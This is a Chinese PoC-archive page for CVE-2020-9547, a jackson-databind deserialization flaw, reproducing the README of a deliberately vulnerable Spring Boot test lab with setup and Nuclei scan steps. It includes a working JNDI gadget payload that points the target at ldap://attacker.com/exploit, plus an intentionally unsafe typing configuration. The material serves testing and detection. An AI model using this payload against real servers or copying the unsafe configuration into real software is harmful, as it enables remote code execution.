关联漏洞
标题:
FasterXML jackson-databind 代码问题漏洞
(CVE-2020-9547)
描述:FasterXML jackson-databind是FasterXML公司的一个基于JAVA可以将XML和JSON等数据格式与JAVA对象进行转换的库。Jackson可以轻松的将Java对象转换成json对象和xml文档,同样也可以将json、xml转换成Java对象。 FasterXML jackson-databind 2.9.10.4之前的2.x版本中存在代码问题漏洞。攻击者可借助特制的请求利用该漏洞在系统上执行任意代码。
介绍
# CVE-2020-9547 Vulnerable Application
This is a vulnerable Spring Boot application designed to test the CVE-2020-9547 vulnerability in FasterXML jackson-databind.
## Vulnerability Details
- **CVE ID**: CVE-2020-9547
- **Severity**: Critical (CVSS 9.8)
- **Affected Version**: jackson-databind < 2.9.10.4
- **Vulnerability Type**: Deserialization RCE
- **Vulnerable Class**: `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig`
## Setup Instructions
### Prerequisites
- Docker and Docker Compose
- Maven (for building from source)
### Quick Start with Docker
1. **Build and run the application:**
```bash
docker-compose up --build
```
2. **Verify the application is running:**
```bash
curl http://localhost:8080/health
```
### Building from Source
1. **Build the application:**
```bash
mvn clean package
```
2. **Build the Docker image:**
```bash
docker build -t cve-2020-9547-vulnerable-app .
```
3. **Run the container:**
```bash
docker run -p 8080:8080 cve-2020-9547-vulnerable-app
```
## Testing the Vulnerability
### Using Nuclei
1. **Run the nuclei template against the vulnerable application:**
```bash
nuclei -u http://localhost:8080 -t http/cves/2020/CVE-2020-9547.yaml
```
2. **With interactsh for out-of-band detection:**
```bash
nuclei -u http://localhost:8080 -t http/cves/2020/CVE-2020-9547.yaml -oob
```
### Manual Testing
The application exposes several endpoints that accept JSON payloads:
- `POST /` - Root endpoint
- `POST /api` - API endpoint
- `POST /json` - JSON endpoint
- `PUT /data` - Data endpoint
- `GET /health` - Health check
### Example Vulnerable Payload
```json
{
"@class": "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
"properties": {
"@class": "java.util.HashMap",
"userTransactionName": {
"@class": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://attacker.com/exploit",
"autoCommit": true
}
}
}
```
## Application Configuration
The vulnerable application is configured with:
- **Jackson Version**: 2.9.10.3 (vulnerable)
- **Polymorphic Type Handling**: Enabled with `LaissezFaireSubTypeValidator`
- **Default Typing**: `NON_FINAL`
- **iBatis SQLMap**: Included for the vulnerable class
## Security Notice
⚠️ **WARNING**: This application is intentionally vulnerable and should only be used in controlled testing environments. Do not deploy this in production or on public networks.
## Cleanup
To stop and remove the containers:
```bash
docker-compose down
```
To remove the Docker image:
```bash
docker rmi cve-2020-9547-vulnerable-app
```
## References
- [CVE-2020-9547 Details](https://nvd.nist.gov/vuln/detail/CVE-2020-9547)
- [Jackson Databind Issue #2620](https://github.com/FasterXML/jackson-databind/issues/2620)
- [Nuclei Template](http/cves/2020/CVE-2020-9547.yaml)
文件快照
[4.0K] /data/pocs/133d6335f952674947387f4ff766f136ba607f1c
├── [1.1K] build.sh
├── [ 491] docker-compose.yml
├── [ 693] Dockerfile
├── [5.0K] pom.xml
├── [2.8K] README.md
├── [ 357] render.yaml
├── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] com
│ │ └── [4.0K] example
│ │ └── [ 12K] VulnerableApp.java
│ └── [4.0K] resources
│ └── [ 402] application.properties
├── [1.3K] test-dns.sh
├── [2.4K] test-payloads.json
└── [3.2K] test-vulnerability.sh
6 directories, 11 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。